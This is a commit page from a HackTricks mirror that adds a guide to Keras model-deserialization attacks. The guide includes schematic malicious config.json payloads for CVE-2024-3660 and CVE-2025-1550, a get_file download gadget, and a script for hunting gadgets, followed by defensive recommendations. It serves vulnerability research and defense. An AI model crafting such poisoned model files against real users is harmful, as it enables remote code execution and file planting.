mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	Merge pull request #1313 from HackTricks-wiki/update_Hunting_Vulnerabilities_in_Keras_Model_Deserializa_20250820_124658
Hunting Vulnerabilities in Keras Model Deserialization
This commit is contained in:
		
						commit
						1624c21cd4
					
				| @ -177,6 +177,15 @@ with tarfile.open("symlink_demo.model", "w:gz") as tf: | |||||||
|     tf.add(PAYLOAD)                      # rides the symlink |     tf.add(PAYLOAD)                      # rides the symlink | ||||||
| ``` | ``` | ||||||
| 
 | 
 | ||||||
|  | ### Deep-dive: Keras .keras deserialization and gadget hunting | ||||||
|  | 
 | ||||||
|  | For a focused guide on .keras internals, Lambda-layer RCE, the arbitrary import issue in Keras ≤ 3.8, and post-fix gadget discovery inside the allowlist, see: | ||||||
|  | 
 | ||||||
|  | 
 | ||||||
|  | {{#ref}} | ||||||
|  | ../generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md | ||||||
|  | {{#endref}} | ||||||
|  | 
 | ||||||
| ## References | ## References | ||||||
| 
 | 
 | ||||||
| - [OffSec blog – "CVE-2024-12029 – InvokeAI Deserialization of Untrusted Data"](https://www.offsec.com/blog/cve-2024-12029/) | - [OffSec blog – "CVE-2024-12029 – InvokeAI Deserialization of Untrusted Data"](https://www.offsec.com/blog/cve-2024-12029/) | ||||||
|  | |||||||
| @ -69,6 +69,7 @@ | |||||||
|   - [Bypass Python sandboxes](generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md) |   - [Bypass Python sandboxes](generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md) | ||||||
|     - [LOAD_NAME / LOAD_CONST opcode OOB Read](generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.md) |     - [LOAD_NAME / LOAD_CONST opcode OOB Read](generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.md) | ||||||
|   - [Class Pollution (Python's Prototype Pollution)](generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md) |   - [Class Pollution (Python's Prototype Pollution)](generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md) | ||||||
|  |   - [Keras Model Deserialization RCE and Gadget Hunting](generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md) | ||||||
|   - [Python Internal Read Gadgets](generic-methodologies-and-resources/python/python-internal-read-gadgets.md) |   - [Python Internal Read Gadgets](generic-methodologies-and-resources/python/python-internal-read-gadgets.md) | ||||||
|   - [Pyscript](generic-methodologies-and-resources/python/pyscript.md) |   - [Pyscript](generic-methodologies-and-resources/python/pyscript.md) | ||||||
|   - [venv](generic-methodologies-and-resources/python/venv.md) |   - [venv](generic-methodologies-and-resources/python/venv.md) | ||||||
|  | |||||||
| @ -7,6 +7,7 @@ | |||||||
| 
 | 
 | ||||||
| - [**Pyscript hacking tricks**](pyscript.md) | - [**Pyscript hacking tricks**](pyscript.md) | ||||||
| - [**Python deserializations**](../../pentesting-web/deserialization/README.md) | - [**Python deserializations**](../../pentesting-web/deserialization/README.md) | ||||||
|  | - [**Keras model deserialization RCE and gadget hunting**](keras-model-deserialization-rce-and-gadget-hunting.md) | ||||||
| - [**Tricks to bypass python sandboxes**](bypass-python-sandboxes/README.md) | - [**Tricks to bypass python sandboxes**](bypass-python-sandboxes/README.md) | ||||||
| - [**Basic python web requests syntax**](web-requests.md) | - [**Basic python web requests syntax**](web-requests.md) | ||||||
| - [**Basic python syntax and libraries**](basic-python.md) | - [**Basic python syntax and libraries**](basic-python.md) | ||||||
|  | |||||||
| @ -0,0 +1,219 @@ | |||||||
|  | # Keras Model Deserialization RCE and Gadget Hunting | ||||||
|  | 
 | ||||||
|  | {{#include ../../banners/hacktricks-training.md}} | ||||||
|  | 
 | ||||||
|  | This page summarizes practical exploitation techniques against the Keras model deserialization pipeline, explains the native .keras format internals and attack surface, and provides a researcher toolkit for finding Model File Vulnerabilities (MFVs) and post-fix gadgets. | ||||||
|  | 
 | ||||||
|  | ## .keras model format internals | ||||||
|  | 
 | ||||||
|  | A .keras file is a ZIP archive containing at least: | ||||||
|  | - metadata.json – generic info (e.g., Keras version) | ||||||
|  | - config.json – model architecture (primary attack surface) | ||||||
|  | - model.weights.h5 – weights in HDF5 | ||||||
|  | 
 | ||||||
|  | The config.json drives recursive deserialization: Keras imports modules, resolves classes/functions and reconstructs layers/objects from attacker-controlled dictionaries. | ||||||
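
As a rough illustration of the layout described above, the following sketch opens a .keras archive with the standard `zipfile` module and lists every module/class_name pair referenced in config.json, without importing Keras or deserializing anything. The helper names (`iter_refs`, `list_refs`) and the in-memory demo archive are hypothetical and only stand in for a real model file.

```python
import io
import json
import zipfile


def iter_refs(node):
    """Yield (module, class_name) for every nested object dict in a config tree."""
    if isinstance(node, dict):
        if "class_name" in node:
            yield node.get("module"), node["class_name"]
        for value in node.values():
            yield from iter_refs(value)
    elif isinstance(node, list):
        for item in node:
            yield from iter_refs(item)


def list_refs(keras_file):
    """Read config.json from a .keras ZIP (path or file object) and collect references."""
    with zipfile.ZipFile(keras_file) as zf:
        config = json.loads(zf.read("config.json"))
    return sorted(set(iter_refs(config)), key=str)


# Build a tiny stand-in archive in memory (not a loadable model) to exercise the helper.
demo = io.BytesIO()
with zipfile.ZipFile(demo, "w") as zf:
    zf.writestr("metadata.json", json.dumps({"keras_version": "3.x"}))
    zf.writestr("config.json", json.dumps({
        "module": "keras.layers",
        "class_name": "Dense",
        "config": {
            "units": 64,
            "activation": {"module": "keras.activations", "class_name": "relu"},
        },
    }))
demo.seek(0)

refs = list_refs(demo)
print(refs)
```

Reviewing this list before loading is a cheap way to spot Lambda layers or unexpected module names in a model from an unknown source.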
|  | 
 | ||||||
|  | Example snippet for a Dense layer object: | ||||||
|  | 
 | ||||||
|  | ```json | ||||||
|  | { | ||||||
|  |   "module": "keras.layers", | ||||||
|  |   "class_name": "Dense", | ||||||
|  |   "config": { | ||||||
|  |     "units": 64, | ||||||
|  |     "activation": { | ||||||
|  |       "module": "keras.activations", | ||||||
|  |       "class_name": "relu" | ||||||
|  |     }, | ||||||
|  |     "kernel_initializer": { | ||||||
|  |       "module": "keras.initializers", | ||||||
|  |       "class_name": "GlorotUniform" | ||||||
|  |     } | ||||||
|  |   } | ||||||
|  | } | ||||||
|  | ``` | ||||||
|  | 
 | ||||||
|  | Deserialization performs: | ||||||
|  | - Module import and symbol resolution from module/class_name keys | ||||||
|  | - from_config(...) or constructor invocation with attacker-controlled kwargs | ||||||
|  | - Recursion into nested objects (activations, initializers, constraints, etc.) | ||||||
|  | 
 | ||||||
|  | Historically, this exposed three primitives to an attacker crafting config.json: | ||||||
|  | - Control of what modules are imported | ||||||
|  | - Control of which classes/functions are resolved | ||||||
|  | - Control of kwargs passed into constructors/from_config | ||||||
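
The three primitives can be seen in a toy deserializer. This is a minimal sketch of the general pattern, not Keras's actual implementation: `naive_deserialize` is a hypothetical name, and the config points at the harmless standard-library class `fractions.Fraction` instead of a real gadget.

```python
import importlib


def naive_deserialize(node):
    """Toy deserializer: import, resolve, recurse, construct. Not Keras code."""
    if isinstance(node, dict) and "module" in node and "class_name" in node:
        module = importlib.import_module(node["module"])   # primitive 1: chosen import
        target = getattr(module, node["class_name"])       # primitive 2: chosen symbol
        kwargs = {
            key: naive_deserialize(value)                  # recursion into nested objects
            for key, value in node.get("config", {}).items()
        }
        return target(**kwargs)                            # primitive 3: chosen kwargs
    return node


cfg = {
    "module": "fractions",
    "class_name": "Fraction",
    "config": {"numerator": 3, "denominator": 4},
}
result = naive_deserialize(cfg)
print(result)
```

Every string in `cfg` comes from the file, so whoever writes the file decides what is imported, what is called, and with which arguments.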
|  | 
 | ||||||
|  | ## CVE-2024-3660 – Lambda-layer bytecode RCE | ||||||
|  | 
 | ||||||
|  | Root cause: | ||||||
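|  | - Lambda.from_config() used python_utils.func_load(...), which base64-decodes attacker bytes and passes them to marshal.loads(). The result is an attacker-chosen code object that is wrapped in a function and runs when the layer is called, which typically happens while the model is being rebuilt at load time. | ||||||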
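
To see why unmarshalling untrusted bytes is dangerous, the sketch below round-trips the bytecode of a harmless function through base64 and `marshal`, then rebuilds a callable from it. It only mirrors the general serialize/load pattern; the function `greet` and the variable names are hypothetical, and Keras's own helper handles extra details (defaults, closures) that are omitted here.

```python
import base64
import marshal
import types


def greet(x):
    return f"ran with {x}"


# What a serializer would store: base64 of the marshalled code object.
blob = base64.b64encode(marshal.dumps(greet.__code__)).decode("ascii")

# What a loader does with it: decode, unmarshal, wrap the code object in a function.
code = marshal.loads(base64.b64decode(blob))
rebuilt = types.FunctionType(code, globals(), "rebuilt")

print(type(code).__name__)
print(rebuilt("input"))
```

Nothing in the blob is validated: whatever code object the bytes describe becomes a callable, and it runs as soon as something invokes it.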
|  | 
 | ||||||
|  | Exploit idea (simplified payload in config.json; the keys under function are schematic, not the exact on-disk schema): | ||||||
|  | 
 | ||||||
|  | ```json | ||||||
|  | { | ||||||
|  |   "module": "keras.layers", | ||||||
|  |   "class_name": "Lambda", | ||||||
|  |   "config": { | ||||||
|  |     "name": "exploit_lambda", | ||||||
|  |     "function": { | ||||||
|  |       "function_type": "lambda", | ||||||
|  |       "bytecode_b64": "<attacker_base64_marshal_payload>" | ||||||
|  |     } | ||||||
|  |   } | ||||||
|  | } | ||||||
|  | ``` | ||||||
|  | 
 | ||||||
|  | Mitigation: | ||||||
|  | - Keras enforces safe_mode=True by default. Serialized Python functions in Lambda are blocked unless a user explicitly opts out with safe_mode=False. | ||||||
|  | 
 | ||||||
|  | Notes: | ||||||
|  | - Legacy formats (older HDF5 saves) or older codebases may not enforce modern checks, so “downgrade” style attacks can still apply when victims use older loaders. | ||||||
|  | 
 | ||||||
|  | ## CVE-2025-1550 – Arbitrary module import in Keras ≤ 3.8 | ||||||
|  | 
 | ||||||
|  | Root cause: | ||||||
|  | - _retrieve_class_or_fn used unrestricted importlib.import_module() with attacker-controlled module strings from config.json. | ||||||
|  | - Impact: Arbitrary import of any installed module (or attacker-planted module on sys.path). Import-time code runs, then object construction occurs with attacker kwargs. | ||||||
|  | 
 | ||||||
|  | Exploit idea: | ||||||
|  | 
 | ||||||
|  | ```json | ||||||
|  | { | ||||||
|  |   "module": "maliciouspkg", | ||||||
|  |   "class_name": "Danger", | ||||||
|  |   "config": {"arg": "val"} | ||||||
|  | } | ||||||
|  | ``` | ||||||
|  | 
 | ||||||
|  | Security improvements (Keras ≥ 3.9): | ||||||
|  | - Module allowlist: imports restricted to official ecosystem modules: keras, keras_hub, keras_cv, keras_nlp | ||||||
|  | - Safe mode default: safe_mode=True blocks unsafe Lambda serialized-function loading | ||||||
|  | - Basic type checking: deserialized objects must match expected types | ||||||
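
A module allowlist of this kind can be sketched as a check on the top-level package name. This is an assumption about the general shape of such a check, not the code Keras ships; `ALLOWED_ROOTS` and `is_allowed_module` are hypothetical names.

```python
ALLOWED_ROOTS = {"keras", "keras_hub", "keras_cv", "keras_nlp"}


def is_allowed_module(module_name):
    """Return True if the top-level package of module_name is on the allowlist."""
    if not isinstance(module_name, str) or not module_name:
        return False
    return module_name.split(".", 1)[0] in ALLOWED_ROOTS


for name in ["keras.layers", "keras_hub.models", "maliciouspkg", "kerasx.evil", "os"]:
    print(name, is_allowed_module(name))
```

Comparing the first dotted component, rather than using a prefix test such as `startswith("keras")`, keeps look-alike packages like `kerasx` out.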
|  | 
 | ||||||
|  | ## Post-fix gadget surface inside allowlist | ||||||
|  | 
 | ||||||
|  | Even with allowlisting and safe mode, a broad surface remains among allowed Keras callables. For example, keras.utils.get_file can download arbitrary URLs to user-selectable locations. | ||||||
|  | 
 | ||||||
|  | Gadget via Lambda that references an allowed function (not serialized Python bytecode): | ||||||
|  | 
 | ||||||
|  | ```json | ||||||
|  | { | ||||||
|  |   "module": "keras.layers", | ||||||
|  |   "class_name": "Lambda", | ||||||
|  |   "config": { | ||||||
|  |     "name": "dl", | ||||||
|  |     "function": {"module": "keras.utils", "class_name": "get_file"}, | ||||||
|  |     "arguments": { | ||||||
|  |       "fname": "artifact.bin", | ||||||
|  |       "origin": "https://example.com/artifact.bin", | ||||||
|  |       "cache_dir": "/tmp/keras-cache" | ||||||
|  |     } | ||||||
|  |   } | ||||||
|  | } | ||||||
|  | ``` | ||||||
|  | 
 | ||||||
|  | Important limitation: | ||||||
|  | - Lambda.call() prepends the input tensor as the first positional argument when invoking the target callable. Chosen gadgets must tolerate an extra positional arg (or accept *args/**kwargs). This constrains which functions are viable. | ||||||
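
One way to pre-filter candidates for this constraint is to check whether a callable's signature can bind one extra leading positional argument plus the chosen keyword arguments. The sketch below uses `inspect.signature(...).bind`; `tolerates_extra_positional` and the three stand-in functions are hypothetical, and a successful bind only shows the call would not fail on argument matching, not that the gadget is useful.

```python
import inspect


def tolerates_extra_positional(fn, kwargs):
    """True if fn(<input>, **kwargs) would bind; False otherwise or if no signature exists."""
    try:
        inspect.signature(fn).bind(object(), **kwargs)
    except (TypeError, ValueError):
        return False
    return True


# Hypothetical stand-ins for candidate gadgets.
def takes_input_first(inputs, path=None):
    return path


def keyword_collides(path=None):
    return path


def no_params():
    return None


print(tolerates_extra_positional(takes_input_first, {"path": "/tmp/x"}))
print(tolerates_extra_positional(keyword_collides, {"path": "/tmp/x"}))
print(tolerates_extra_positional(no_params, {}))
```

The second case fails because the prepended input already occupies the `path` slot, so passing `path` again as a keyword is a duplicate.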
|  | 
 | ||||||
|  | Potential impacts of allowlisted gadgets: | ||||||
|  | - Arbitrary download/write (path planting, config poisoning) | ||||||
|  | - Network callbacks/SSRF-like effects depending on environment | ||||||
|  | - Chaining to code execution if written paths are later imported/executed or added to PYTHONPATH, or if a writable execution-on-write location exists | ||||||
|  | 
 | ||||||
|  | ## Researcher toolkit | ||||||
|  | 
 | ||||||
|  | 1) Systematic gadget discovery in allowed modules | ||||||
|  | 
 | ||||||
|  | Enumerate candidate callables across keras, keras_nlp, keras_cv, keras_hub and prioritize those with file/network/process/env side effects. | ||||||
|  | 
 | ||||||
|  | ```python | ||||||
|  | import importlib, inspect, pkgutil | ||||||
|  | 
 | ||||||
|  | ALLOWLIST = ["keras", "keras_nlp", "keras_cv", "keras_hub"] | ||||||
|  | 
 | ||||||
|  | seen = set() | ||||||
|  | 
 | ||||||
|  | def iter_modules(mod): | ||||||
|  |     if not hasattr(mod, "__path__"): | ||||||
|  |         return | ||||||
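|  |     # onerror swallows non-ImportError failures raised while walking subpackages | ||||||
|  |     for m in pkgutil.walk_packages(mod.__path__, mod.__name__ + ".", onerror=lambda _name: None): | ||||||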
|  |         yield m.name | ||||||
|  | 
 | ||||||
|  | candidates = [] | ||||||
|  | for root in ALLOWLIST: | ||||||
|  |     try: | ||||||
|  |         r = importlib.import_module(root) | ||||||
|  |     except Exception: | ||||||
|  |         continue | ||||||
|  |     for name in iter_modules(r): | ||||||
|  |         if name in seen: | ||||||
|  |             continue | ||||||
|  |         seen.add(name) | ||||||
|  |         try: | ||||||
|  |             m = importlib.import_module(name) | ||||||
|  |         except Exception: | ||||||
|  |             continue | ||||||
|  |         for n, obj in inspect.getmembers(m): | ||||||
|  |             if inspect.isfunction(obj) or inspect.isclass(obj): | ||||||
|  |                 sig = None | ||||||
|  |                 try: | ||||||
|  |                     sig = str(inspect.signature(obj)) | ||||||
|  |                 except Exception: | ||||||
|  |                     pass | ||||||
|  |                 doc = (inspect.getdoc(obj) or "").lower() | ||||||
|  |                 text = f"{name}.{n} {sig} :: {doc}" | ||||||
|  |                 # Heuristics: look for I/O or network-ish hints | ||||||
|  |                 if any(x in doc for x in ["download", "file", "path", "open", "url", "http", "socket", "env", "process", "spawn", "exec"]): | ||||||
|  |                     candidates.append(text) | ||||||
|  | 
 | ||||||
|  | print("\n".join(sorted(candidates)[:200])) | ||||||
|  | ``` | ||||||
|  | 
 | ||||||
|  | 2) Direct deserialization testing (no .keras archive needed) | ||||||
|  | 
 | ||||||
|  | Feed crafted dicts directly into Keras deserializers to learn accepted params and observe side effects. | ||||||
|  | 
 | ||||||
|  | ```python | ||||||
|  | from keras import saving | ||||||
|  | 
 | ||||||
|  | cfg = { | ||||||
|  |   "module": "keras.layers", | ||||||
|  |   "class_name": "Lambda", | ||||||
|  |   "config": { | ||||||
|  |     "name": "probe", | ||||||
|  |     "function": {"module": "keras.utils", "class_name": "get_file"}, | ||||||
|  |     "arguments": {"fname": "x", "origin": "https://example.com/x"} | ||||||
|  |   } | ||||||
|  | } | ||||||
|  | 
 | ||||||
|  | # In Keras 3, keras.layers.deserialize() takes no safe_mode argument; the generic deserializer does | ||||||
|  | layer = saving.deserialize_keras_object(cfg, safe_mode=True)  # Observe behavior | ||||||
|  | ``` | ||||||
|  | 
 | ||||||
|  | 3) Cross-version probing and formats | ||||||
|  | 
 | ||||||
|  | Keras exists in multiple codebases/eras with different guardrails and formats: | ||||||
|  | - TensorFlow built-in Keras: tensorflow/python/keras (legacy, slated for deletion) | ||||||
|  | - tf-keras: maintained separately | ||||||
|  | - Multi-backend Keras 3 (official): introduced native .keras | ||||||
|  | 
 | ||||||
|  | Repeat tests across codebases and formats (.keras vs legacy HDF5) to uncover regressions or missing guards. | ||||||
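
When repeating tests across codebases, it helps to record exactly which distributions and versions were present in each environment. A minimal sketch using `importlib.metadata` follows; the distribution names in `CODEBASES` are assumptions about how each codebase is packaged, and `installed_versions` is a hypothetical helper.

```python
from importlib import metadata

# Distribution names are assumptions about how each codebase is packaged.
CODEBASES = ["keras", "tf-keras", "tensorflow"]


def installed_versions(names):
    """Map each distribution name to its installed version, or None if absent."""
    found = {}
    for name in names:
        try:
            found[name] = metadata.version(name)
        except metadata.PackageNotFoundError:
            found[name] = None
    return found


print(installed_versions(CODEBASES))
```

Logging this alongside each probe result makes it easier to attribute a behavior difference to a specific loader version.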
|  | 
 | ||||||
|  | ## Defensive recommendations | ||||||
|  | 
 | ||||||
|  | - Treat model files as untrusted input. Only load models from trusted sources. | ||||||
|  | - Keep Keras up to date; use Keras ≥ 3.9 to benefit from allowlisting and type checks. | ||||||
|  | - Do not set safe_mode=False when loading models unless you fully trust the file. | ||||||
|  | - Consider running deserialization in a sandboxed, least-privileged environment without network egress and with restricted filesystem access. | ||||||
|  | - Enforce allowlists/signatures for model sources and integrity checking where possible. | ||||||
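
The integrity-checking recommendation can be sketched as a digest pin that is verified before any loader touches the file. This is a minimal example under the assumption that a trusted SHA-256 value is distributed out of band; `sha256_of` and `verify_model` are hypothetical helpers, and the temporary file only stands in for a real model.

```python
import hashlib
import hmac
import os
import tempfile


def sha256_of(path, chunk_size=1 << 20):
    """Stream the file through SHA-256 and return the hex digest."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_model(path, expected_sha256):
    """Return True only if the file's digest matches the pinned value."""
    return hmac.compare_digest(sha256_of(path), expected_sha256.lower())


# Stand-in file; a real check would run on the downloaded .keras file.
with tempfile.NamedTemporaryFile(suffix=".keras", delete=False) as tmp:
    tmp.write(b"stand-in model bytes")
    demo_path = tmp.name

pinned = hashlib.sha256(b"stand-in model bytes").hexdigest()
ok = verify_model(demo_path, pinned)
tampered = verify_model(demo_path, "0" * 64)
os.remove(demo_path)

print(ok, tampered)
```

A matching digest only proves the file is the one that was pinned; it says nothing about whether that file was safe to begin with, so it complements sandboxing without replacing it.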
|  | 
 | ||||||
|  | ## References | ||||||
|  | 
 | ||||||
|  | - [Hunting Vulnerabilities in Keras Model Deserialization (huntr blog)](https://blog.huntr.com/hunting-vulnerabilities-in-keras-model-deserialization) | ||||||
|  | - [Keras PR #20751 – Added checks to serialization](https://github.com/keras-team/keras/pull/20751) | ||||||
|  | - [CVE-2024-3660 – Keras Lambda deserialization RCE](https://nvd.nist.gov/vuln/detail/CVE-2024-3660) | ||||||
|  | - [CVE-2025-1550 – Keras arbitrary module import (≤ 3.8)](https://nvd.nist.gov/vuln/detail/CVE-2025-1550) | ||||||
|  | - [huntr report – arbitrary import #1](https://huntr.com/bounties/135d5dcd-f05f-439f-8d8f-b21fdf171f3e) | ||||||
|  | - [huntr report – arbitrary import #2](https://huntr.com/bounties/6fcca09c-8c98-4bc5-b32c-e883ab3e4ae3) | ||||||
|  | 
 | ||||||
|  | {{#include ../../banners/hacktricks-training.md}} | ||||||